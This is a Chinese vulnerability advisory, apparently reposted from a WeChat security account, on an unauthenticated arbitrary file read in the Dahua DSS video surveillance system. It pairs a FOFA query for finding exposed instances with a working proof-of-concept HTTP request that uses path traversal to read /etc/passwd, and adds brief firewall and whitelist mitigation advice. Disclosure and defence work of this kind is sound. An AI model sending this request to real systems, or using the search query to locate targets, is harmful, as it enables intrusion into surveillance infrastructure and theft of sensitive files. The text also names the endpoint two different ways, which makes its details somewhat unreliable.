大华DSS数字监控系统 attachment_downloadAtt.action 任意文件读取漏洞 PoC

admin 2024年12月15日23:25:50评论61 views字数 1000阅读3分20秒阅读模式

 

0x02

产品介绍

大华DSS数字监控系统是一个在通用安防视频监控系统基础上设计开发的系统,专为各类企业和组织提供高效、稳定且全面的视频监控解决方案,旨在提升安全防护能力,优化运营管理。支持高清视频流处理,确保图像清晰度,提高监控质量。内置多种智能分析算法,如人脸识别、行为分析、异常检测等,提高预警效率。支持移动终端访问,用户可以随时随地查看监控画面。采用加密技术,保护数据安全,防止非法入侵。典型组网结构包括前端设备(摄像头)、后端服务器、存储设备、网络设备以及客户端软件。系统基于模块化设计,易于扩展和维护。总体层次结构通常包括基层监控节点、区域中心、总中心等多级架构。同时,系统支持多级中心互联,实现远程监控和管理。

0x03

漏洞威胁

大华DSS数字监控系统  attachment_downloadByUrlAtt.action接口存在任意文件读取漏洞,未经身份验证的远程攻击者 可以利用此漏洞获取系统内部敏感文件信息,使系统处于极不安全的状态。

0x04

漏洞环境

FOFA:

app="dahua-DSS"

大华DSS数字监控系统 attachment_downloadAtt.action 任意文件读取漏洞 PoC

0x05

漏洞复现

PoC

GET /portal/attachment_downloadAtt.action?filePath=../../../../../../etc/passwd HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: close
大华DSS数字监控系统 attachment_downloadAtt.action 任意文件读取漏洞 PoC
0x06

批量脚本验证

Nuclei验证脚本已发布知识星球:冷漠安全

大华DSS数字监控系统 attachment_downloadAtt.action 任意文件读取漏洞 PoC

0x07

修复建议

目前已提供解决方案,请关注厂商主页更新:https://www.dahuatech.com/

临时修复方案:

通过防火墙等安全设备设置访问策略,设置白名单访问。

如非必要,禁止公网访问该系统。

0x08

 

原文始发于微信公众号(冷漠安全):大华DSS数字监控系统 attachment_downloadAtt.action 任意文件读取漏洞

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月15日23:25:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   大华DSS数字监控系统 attachment_downloadAtt.action 任意文件读取漏洞 PoChttps://cn-sec.com/archives/3510232.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息